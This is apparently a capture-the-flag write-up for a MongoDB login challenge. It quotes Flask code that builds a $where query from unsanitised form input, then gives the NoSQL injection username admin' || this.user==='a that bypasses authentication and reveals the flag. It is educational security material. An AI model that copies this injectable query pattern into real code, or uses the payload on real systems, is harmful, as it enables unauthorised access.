Tags: mongodb web nosql
Rating:
Writeup starts at 01:45 on the video.
The source code for this challenge is provided. The server is vulnerable to nosql injection:
```
@app.route("/", methods=["POST"])
def login():
if "user" not in request.form:
return redirect(url_for("main", error="user not provided"))
if "password" not in request.form:
return redirect(url_for("main", error="password not provided"))
try:
user = db.users.find_one(
{
"$where":
f"this.user === '{request.form['user']}' && this.password === '{request.form['password']}'"
}
)
```
On the where property there is user input getting into the db query without any validation or sanitization. This allows us to bypass the login if we use the following as username:
```
admin' || this.user==='a
```
flag{easier_than_picture_lab_at_least}
